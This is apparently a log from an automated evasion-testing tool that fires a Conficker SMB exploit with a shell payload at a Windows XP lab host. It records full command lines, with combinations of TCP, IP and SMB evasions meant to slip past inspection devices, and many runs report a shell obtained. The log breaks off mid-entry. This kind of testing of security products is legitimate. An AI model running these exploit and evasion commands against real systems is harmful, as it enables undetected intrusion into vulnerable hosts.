401. 490 runs averaging 1.23 runs / second ; progress: 398/43200..Pid 10949 timed out - killed
402. 2015-11-29 14:32:30 INFO
403. Timed out (10.62.90.114):
404. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44674 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=wBfabVk6tio --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"1","4","402","zero" --evasion=[smb_opentree,msrpc_bind]tcp_paws,"21","72020197","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
405. Info: Using random seed wBfabVk6tir
406. The following evasions are applied from stage smb_opentree to msrpc_bind:
407. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72020197> and has original payload with alphabetic bytes randomized
408. The following evasions are applied from stage smb_opentree to smb_openpipe:
409. - Before normal SMB writes, 1 SMB trees are opened and 4 writes are performed to them. The write payload is 402 bytes of zeroes.
410. The following evasions are applied from stage smb_openpipe to msrpc_bind:
411. - Add a zero urgent data byte to every 1 TCP segment.
412.  
413. Info: NetBIOS connection 10.62.90.114:44674 -> 10.35.1.207:445
414. Terminated
415. ..............
416. 507 runs averaging 1.26 runs / second ; progress: 403/43200.Pid 11049 timed out - killed
417. 2015-11-29 14:32:34 INFO
418. Timed out (10.62.90.116):
419. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20633 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=nYnMAcjCpmw --evasion=[smb_openpipe,msrpc_bind]smb_chaff,"1","write_flag","alphanum" --evasion=[smb_connect,smb_opentree]tcp_urgent,"8","random" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
420. Info: Using random seed nYnMAcjCpmy
421. The following evasions are applied from stage smb_connect to smb_opentree:
422. - Add a random urgent data byte to every 8 TCP segment.
423. The following evasions are applied from stage smb_connect to msrpc_bind:
424. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
425. The following evasions are applied from stage smb_openpipe to msrpc_bind:
426. - Before every 1th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
427.  
428. Info: NetBIOS connection 10.62.90.116:20633 -> 10.35.1.207:445
429. Terminated
430. .........
431. 518 runs averaging 1.27 runs / second ; progress: 408/43200......2015-11-29 14:32:41 INFO
432. Success. (10.62.90.116):
433. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55872 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=AI55OQEvx44 --evasion=[smb_connect,smb_opentree]tcp_paws,"1","10","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_paws,"25%","10","zero" --verifydelay=1000 --payload=shell
434. Info: Using random seed AI55OQEvx44
435. The following evasions are applied from stage smb_connect to smb_opentree:
436. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has shuffled original payload
437. The following evasions are applied from stage smb_opentree to msrpc_req:
438. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 0x00 bytes as payload
439.  
440.  
441. Info: NetBIOS connection 10.62.90.118:43937 -> 10.35.1.207:445
442. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
443. Info: Sending MSRPC request with exploit
444. Info: Shell found, attack succeeded
445. Info: CommandShell::SendCommand() - Failed to send string
446. Info: Command shell connection reset.
447. Info: Shell closed
448. 0: Success.
449. ...........
450. 27056 runs averaging 1.75 runs / second ; progress: 15463/43200.....2015-11-29 18:43:38 INFO
451. Success. (10.62.90.118):
452. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37311 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=wyvgfRwwEMY --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"696","zero" --evasion=[smb_connect,end]tcp_paws,"5","268435454","random" --verifydelay=1000 --payload=shell
453. Info: Using random seed wyvgfRwwEMb
454. The following evasions are applied from stage smb_connect to end:
455. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random bytes as payload
456. The following evasions are applied from stage smb_openpipe to msrpc_req:
457. - 696 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
458.  
459. Info: NetBIOS connection 10.62.90.118:37311 -> 10.35.1.207:445
460. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
461. Info: Sending MSRPC request with exploit
462. Info: Shell found, attack succeeded
463. Info: CommandShell::SendCommand() - Failed to send string
464. Info: Command shell connection reset.
465. Info: Shell closed
466. 0: Success.
467. .
468. 27063 runs averaging 1.75 runs / second ; progress: 15468/43200.....
469. 27068 runs averaging 1.75 runs / second ; progress: 15473/43200........Pid 30630 timed out - killed
470. 2015-11-29 18:43:47 INFO
471. Timed out (10.62.90.112):
472. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11483 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=I2UFterCp8Q --evasion=[smb_opentree,end]smb_decoytrees,"5","4","1","random" --evasion=[smb_opentree,msrpc_req]tcp_chaff,"13","nullchksum|shorthdr|longhdr","random" --evasion=[netbios_connect,end]tcp_urgent,"8","zero" --verifydelay=1000 --payload=shell
473. Info: Using random seed I2UFterCp8Q
474. The following evasions are applied from stage netbios_connect to end:
475. - Add a zero urgent data byte to every 8 TCP segment.
476. The following evasions are applied from stage smb_opentree to msrpc_req:
477. - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
478. * NULL TCP checksum.
479. * TCP header shorter than 20 bytes
480. * TCP header longer than packet total size
481. * Duplicate packet has random bytes as payload
482. The following evasions are applied from stage smb_opentree to end:
483. - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 1 random bytes.
484.  
485. Info: NetBIOS connection 10.62.90.112:11483 -> 10.35.1.207:445
486. Terminated
487. .2015-11-29 18:43:48 INFO
488. Success. (10.62.90.112):
489. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55625 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=avb+WdU5Of4 --evasion=[start,end]tcp_paws,"1","268435454","random_alphanum" --evasion=[msrpc_bind,end]tcp_segvar,"16208","65535" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
490. Info: Using random seed avb+WdU5Of5
491. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
492. The following evasions are applied from stage netbios_connect to msrpc_req:
493. - Add a random alphaurgent data byte to every 13 TCP segment.
494. The following evasions are applied from stage msrpc_bind to end:
495. - TCP packets are segmented to contain between 16208 and 65535 bytes of payload.
496.  
497. Info: NetBIOS connection 10.62.90.112:55625 -> 10.35.1.207:445
498. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
499. Info: Sending MSRPC request with exploit
500. Info: Shell found, attack succeeded
501. Info: CommandShell::SendCommand() - Failed to send string
502. Info: Command shell connection reset.
503. Info: Shell closed
504. 0: Success.
505. .
506. 27080 runs averaging 1.75 runs / second ; progress: 15478/43200.........
507. 27089 runs averaging 1.75 runs / second ; progress: 15483/43200..............
508. 27103 runs averaging 1.75 runs / second ; progress: 15488/43200..........
509. 27113 runs averaging 1.75 runs / second ; progress: 15494/43200.......
510. 27120 runs averaging 1.75 runs / second ; progress: 15499/43200.....
511. 27125 runs averaging 1.75 runs / second ; progress: 15504/43200..............
512. 27139 runs averaging 1.75 runs / second ; progress: 15509/43200.............2015-11-29 18:44:23 INFO
513. Success. (10.62.90.112):
514. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57484 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=7SAxpWZ4/YA --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","3","2","random_msrpcbind" --evasion=[smb_openpipe,end]tcp_overlap,"4","new","random_alpha" --verifydelay=1000 --payload=shell
515. Info: Using random seed 7SAxpWZ4/YD
516. The following evasions are applied from stage smb_opentree to msrpc_req:
517. - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
518. The following evasions are applied from stage smb_openpipe to end:
519. - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
520.  
521. Info: NetBIOS connection 10.62.90.112:57484 -> 10.35.1.207:445
522. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
523. Info: Sending MSRPC request with exploit
524. Info: Shell found, attack succeeded
525. Info: Shell closed
526. 0: Success.
527. ...
528. 27156 runs averaging 1.75 runs / second ; progress: 15514/43200..........2015-11-29 18:44:26 INFO
529. Success. (10.62.90.117):
530. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64704 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=/auJxU4Kc4s --evasion=[start,end]tcp_paws,"25%","3","random_alphanum" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"2","1","alpharandomized" --verifydelay=1000 --payload=shell
531. Info: Using random seed /auJxU4Kc4v
532. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
533. The following evasions are applied from stage smb_opentree to smb_openpipe:
534. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has original payload with alphabetic bytes randomized
535.  
536. Info: NetBIOS connection 10.62.90.117:64704 -> 10.35.1.207:445
537. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
538. Info: Sending MSRPC request with exploit
539. Info: Shell found, attack succeeded
540. Info: Shell closed
541. 0: Success.
542. ...................
543. 27186 runs averaging 1.75 runs / second ; progress: 15519/43200.........................
544. 27211 runs averaging 1.75 runs / second ; progress: 15524/43200........2015-11-29 18:44:37 INFO
545. Success. (10.62.90.115):
546. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24056 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=6n+RdaEVnnA --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"1","4","2046","random" --evasion=[msrpc_bind,end]tcp_paws,"1","268435455","zero" --verifydelay=1000 --payload=shell
547. Info: Using random seed 6n+RdaEVnnD
548. The following evasions are applied from stage smb_openpipe to msrpc_req:
549. - Before normal SMB writes, 1 SMB trees are opened and 4 writes are performed to them. The write payload is 2046 random bytes.
550. The following evasions are applied from stage msrpc_bind to end:
551. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
552.  
553. Info: NetBIOS connection 10.62.90.115:24056 -> 10.35.1.207:445
554. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
555. Info: Sending MSRPC request with exploit
556. Info: Shell found, attack succeeded
557. Info: Shell closed
558. 0: Success.
559. ........
560. 27228 runs averaging 1.75 runs / second ; progress: 15529/43200..............
561. 27242 runs averaging 1.75 runs / second ; progress: 15534/43200..........
562. 27252 runs averaging 1.75 runs / second ; progress: 15539/43200.............2015-11-29 18:44:52 INFO
563. Success. (10.62.90.118):
564. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26003 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=XAiIoFWwcfc --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"6","5","695","random_msrpcbind" --evasion=[start,end]tcp_initialseq,"4294967293" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","6","random_alphanum" --verifydelay=1000 --payload=shell
565. Info: Using random seed XAiIoFWwcfd
566. - Initial TCP sequence number is set to 0xffffffff - 4294967293
567. The following evasions are applied from stage smb_openpipe to msrpc_req:
568. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alphanumeric bytes as payload
569. The following evasions are applied from stage msrpc_bind to msrpc_req:
570. - Before normal SMB writes, 6 SMB trees are opened and 5 writes are performed to them. The write payload is 695 bytes of MSRPC bind-like data.
571.  
572. Info: NetBIOS connection 10.62.90.118:26003 -> 10.35.1.207:445
573. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
574. Info: Sending MSRPC request with exploit
575. Info: Shell found, attack succeeded
576. Info: Shell closed
577. 0: Success.
578. ..........
579. 27276 runs averaging 1.75 runs / second ; progress: 15544/43200...........
580. 27287 runs averaging 1.75 runs / second ; progress: 15549/43200...Pid 31683 timed out - killed
581. 2015-11-29 18:45:00 INFO
582. Timed out (10.62.90.119):
583. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55926 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=aGAi08H15y0 --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"72" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
584. Info: Using random seed aGAi08H15y1
585. The following evasions are applied from stage smb_openpipe to msrpc_bind:
586. - IPv4 fragments with at most 72 bytes per fragment
587. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
588.  
589. Info: NetBIOS connection 10.62.90.119:55926 -> 10.35.1.207:445
590. Terminated
591. ..............
592. 27305 runs averaging 1.76 runs / second ; progress: 15554/43200......2015-11-29 18:45:09 INFO
593. Success. (10.62.90.116):
594. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30801 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hx3QRcDiL+U --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","9","random_alphanum" --evasion=[netbios_connect,end]tcp_timewait,"3","random_alpha" --verifydelay=1000 --payload=shell
595. Info: Using random seed hx3QRcDiL+W
596. The following evasions are applied from stage netbios_connect to end:
597. - 3 decoy TCP connections are opened from the same TCP port as the exploit connection will use. Each connection will be 32-544 bytes long and has random alpha bytes as payload
598. The following evasions are applied from stage msrpc_bind to msrpc_req:
599. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alphanumeric bytes as payload
600.  
601. Info: NetBIOS connection 10.62.90.116:30801 -> 10.35.1.207:445
602. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
603. Info: Sending MSRPC request with exploit
604. Info: Shell found, attack succeeded
605. Info: CommandShell::SendCommand() - Failed to send string
606. Info: Command shell connection reset.
607. Info: Shell closed
608. 0: Success.
609. ..
610. 27314 runs averaging 1.76 runs / second ; progress: 15559/43200.........2015-11-29 18:45:11 INFO
611. Success. (10.62.90.116):
612. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49130 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=f/d/WoCn4s8 --evasion=[netbios_connect,msrpc_bind]tcp_chaff,"25%","nullflag|outofwindow|longhdr","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"75%","5","random" --verifydelay=1000 --payload=shell
613. Info: Using random seed f/d/WoCn4s9
614. The following evasions are applied from stage netbios_connect to msrpc_bind:
615. - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
616. * NULL TCP control flags.
617. * An out-of-window sequence number.
618. * TCP header longer than packet total size
619. * Duplicate packet has original payload with alphabetic bytes randomized
620. The following evasions are applied from stage smb_openpipe to msrpc_req:
621. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random bytes as payload
622.  
623. Info: NetBIOS connection 10.62.90.116:49130 -> 10.35.1.207:445
624. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
625. Info: Sending MSRPC request with exploit
626. Info: Shell found, attack succeeded
627. Info: Command shell connection reset.
628. Info: CommandShell::SendCommand() - Failed to send string
629. Info: Shell closed
630. 0: Success.
631. ..................................
632. 27358 runs averaging 1.76 runs / second ; progress: 15564/43200...............
633. 27373 runs averaging 1.76 runs / second ; progress: 15569/43200...................
634. 27392 runs averaging 1.76 runs / second ; progress: 15574/43200..............2015-11-29 18:45:29 INFO
635. Success. (10.62.90.119):
636. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17524 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=DsBpCDc6WlQ --evasion=[start,end]ipv4_frag,"1472" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","3","random" --verifydelay=1000 --payload=shell
637. Info: Using random seed DsBpCDc6WlQ
638. - IPv4 fragments with at most 1472 bytes per fragment
639. The following evasions are applied from stage smb_opentree to msrpc_req:
640. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random bytes as payload
641.  
642. Info: NetBIOS connection 10.62.90.119:17524 -> 10.35.1.207:445
643. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
644. Info: Sending MSRPC request with exploit
645. Info: Shell found, attack succeeded
646. Info: Shell closed
647. 0: Success.
648. .
649. 27408 runs averaging 1.76 runs / second ; progress: 15579/43200................2015-11-29 18:45:34 INFO
650. Success. (10.62.90.116):
651. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41391 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Ch09Osy0JA4 --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"25%","chksum|outofwindow|longhdr","random_alphanum" --evasion=[start,end]tcp_paws,"21","14850612","alpharandomized" --evasion=[msrpc_bind,end]tcp_paws,"50%","30115434","random_alphanum" --verifydelay=1000 --payload=shell
652. Info: Using random seed Ch09Osy0JA4
653. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 14850612> and has original payload with alphabetic bytes randomized
654. The following evasions are applied from stage smb_opentree to msrpc_bind:
655. - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
656. * Invalid TCP checksum.
657. * An out-of-window sequence number.
658. * TCP header longer than packet total size
659. * Duplicate packet has random alphanumeric bytes as payload
660. The following evasions are applied from stage msrpc_bind to end:
661. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 30115434> and has random alphanumeric bytes as payload
662.  
663. Info: NetBIOS connection 10.62.90.116:41391 -> 10.35.1.207:445
664. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
665. Info: Sending MSRPC request with exploit
666. Info: Shell found, attack succeeded
667. Info: CommandShell::SendCommand() - Failed to send string
668. Info: Command shell connection reset.
669. Info: Shell closed
670. 0: Success.
671. .....
672. 27430 runs averaging 1.76 runs / second ; progress: 15584/43200.................2015-11-29 18:45:39 INFO
673. Success. (10.62.90.119):
674. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62870 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=hcPJC8sYLrg --evasion=[smb_opentree,end]netbios_chaff,"25%","http_get|msrpc_req|broken_length" --evasion=[netbios_connect,end]tcp_paws,"2","5","random_alpha" --verifydelay=1000 --payload=shell
675. Info: Using random seed hcPJC8sYLri
676. The following evasions are applied from stage netbios_connect to end:
677. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
678. The following evasions are applied from stage smb_opentree to end:
679. - 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
680.  
681. Info: NetBIOS connection 10.62.90.119:62870 -> 10.35.1.207:445
682. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
683. Info: Sending MSRPC request with exploit
684. Info: Shell found, attack succeeded
685. Info: CommandShell::SendCommand() - Failed to send string
686. Info: Command shell connection reset.
687. Info: Shell closed
688. 0: Success.
689. ..
690. 27450 runs averaging 1.76 runs / second ; progress: 15589/43200.............
691. 27463 runs averaging 1.76 runs / second ; progress: 15594/43200Pid 32419 timed out - killed
692. 2015-11-29 18:45:48 INFO
693. Timed out (10.62.90.114):
694. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24326 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=bPs+NuUP/pQ --evasion=[start,smb_opentree]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
695. Info: Using random seed bPs+NuUP/pR
696. The following evasions are applied from stage start to smb_opentree:
697. - IPv4 fragments with at most 1472 bytes per fragment
698. The following evasions are applied from stage smb_openpipe to msrpc_req:
699. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
700.  
701. Info: NetBIOS connection 10.62.90.114:24326 -> 10.35.1.207:445
702. Terminated
703. .
704. 27465 runs averaging 1.76 runs / second ; progress: 15599/43200.....
705. 27470 runs averaging 1.76 runs / second ; progress: 15604/43200..............
706. 27484 runs averaging 1.76 runs / second ; progress: 15609/43200....................
707. 27504 runs averaging 1.76 runs / second ; progress: 15614/43200..................
708. 27522 runs averaging 1.76 runs / second ; progress: 15619/43200....
709. 27526 runs averaging 1.76 runs / second ; progress: 15624/43200..........
710. 27536 runs averaging 1.76 runs / second ; progress: 15629/43200...............
711. 27551 runs averaging 1.76 runs / second ; progress: 15634/43200........................
712. 27575 runs averaging 1.76 runs / second ; progress: 15640/43200...........
713. 27586 runs averaging 1.76 runs / second ; progress: 15645/43200............
714. 27598 runs averaging 1.76 runs / second ; progress: 15650/43200.........
715. 27607 runs averaging 1.76 runs / second ; progress: 15655/43200..2015-11-29 18:46:47 INFO
716. Success. (10.62.90.112):
717. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59721 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=891bOi00Urw --evasion=[netbios_connect,smb_opentree]ipv4_frag,"80" --evasion=[smb_opentree,end]tcp_paws,"5","268435455","random_alpha" --verifydelay=1000 --payload=shell
718. Info: Using random seed 891bOi00Urz
719. The following evasions are applied from stage netbios_connect to smb_opentree:
720. - IPv4 fragments with at most 80 bytes per fragment
721. The following evasions are applied from stage smb_opentree to end:
722. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
723.  
724. Info: NetBIOS connection 10.62.90.112:59721 -> 10.35.1.207:445
725. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
726. Info: Sending MSRPC request with exploit
727. Info: Shell found, attack succeeded
728. Info: Shell closed
729. 0: Success.
730. ..................
731. 27628 runs averaging 1.76 runs / second ; progress: 15660/43200..................
732. 27646 runs averaging 1.76 runs / second ; progress: 15665/43200.........
733. 27655 runs averaging 1.76 runs / second ; progress: 15670/43200.2015-11-29 18:47:01 INFO
734. Success. (10.62.90.117):
735. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33922 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=GNVZQxmNpFE --evasion=[msrpc_bind,end]smb_decoytrees,"3","4","1","random_msrpcbind" --evasion=[msrpc_bind,msrpc_req]smb_seg,"7" --verifydelay=1000 --payload=shell
736. Info: Using random seed GNVZQxmNpFE
737. The following evasions are applied from stage msrpc_bind to end:
738. - Before normal SMB writes, 3 SMB trees are opened and 4 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
739. The following evasions are applied from stage msrpc_bind to msrpc_req:
740. - SMB writes are segmented to contain at most 7 bytes of payload.
741.  
742. Info: NetBIOS connection 10.62.90.117:33922 -> 10.35.1.207:445
743. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
744. Info: Sending MSRPC request with exploit
745. Info: Shell found, attack succeeded
746. Info: Command shell connection reset.
747. Info: CommandShell::SendCommand() - Failed to send string
748. Info: Shell closed
749. 0: Success.
750. .......
751. 27664 runs averaging 1.76 runs / second ; progress: 15675/43200............
752. 27676 runs averaging 1.77 runs / second ; progress: 15680/43200.........
753. 27685 runs averaging 1.77 runs / second ; progress: 15685/43200......2015-11-29 18:47:18 INFO
754. Success. (10.62.90.117):
755. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23932 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=eZYvNY6iczk --evasion=[smb_connect,smb_openpipe]smb_writeandxpad,"858","random" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","4","alpharandomized" --verifydelay=1000 --payload=shell
756. Info: Using random seed eZYvNY6iczl
757. The following evasions are applied from stage smb_connect to smb_openpipe:
758. - 858 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
759. The following evasions are applied from stage smb_openpipe to msrpc_req:
760. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphabetic bytes randomized
761.  
762. Info: NetBIOS connection 10.62.90.117:23932 -> 10.35.1.207:445
763. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
764. Info: Sending MSRPC request with exploit
765. Info: Shell found, attack succeeded
766. Info: Shell closed
767. 0: Success.
768. ....
769. 27696 runs averaging 1.77 runs / second ; progress: 15690/43200.Pid 956 timed out - killed
770. 2015-11-29 18:47:21 INFO
771. Timed out (10.62.90.111):
772. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55909 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=tnVOfG/VLwU --evasion=[smb_connect,msrpc_req]smb_decoytrees,"3","2","973","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_urgent,"5","random" --verifydelay=1000 --payload=shell
773. Info: Using random seed tnVOfG/VLwW
774. The following evasions are applied from stage smb_connect to msrpc_req:
775. - Before normal SMB writes, 3 SMB trees are opened and 2 writes are performed to them. The write payload is 973 bytes of MSRPC request-like data.
776. The following evasions are applied from stage smb_openpipe to end:
777. - Add a random urgent data byte to every 5 TCP segment.
778.  
779. Info: NetBIOS connection 10.62.90.111:55909 -> 10.35.1.207:445
780. Terminated
781. ...............
782. 27713 runs averaging 1.77 runs / second ; progress: 15695/43200..........
783. 27723 runs averaging 1.77 runs / second ; progress: 15700/43200.............
784. 27736 runs averaging 1.77 runs / second ; progress: 15705/43200......Pid 1391 timed out - killed
785. 2015-11-29 18:47:38 INFO
786. Timed out (10.62.90.110):
787. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29321 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=AzPJyM0KsdE --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"5","empty_keepalive|small_unspec|http_get|msrpc_req" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
788. Info: Using random seed AzPJyM0KsdE
789. The following evasions are applied from stage smb_connect to end:
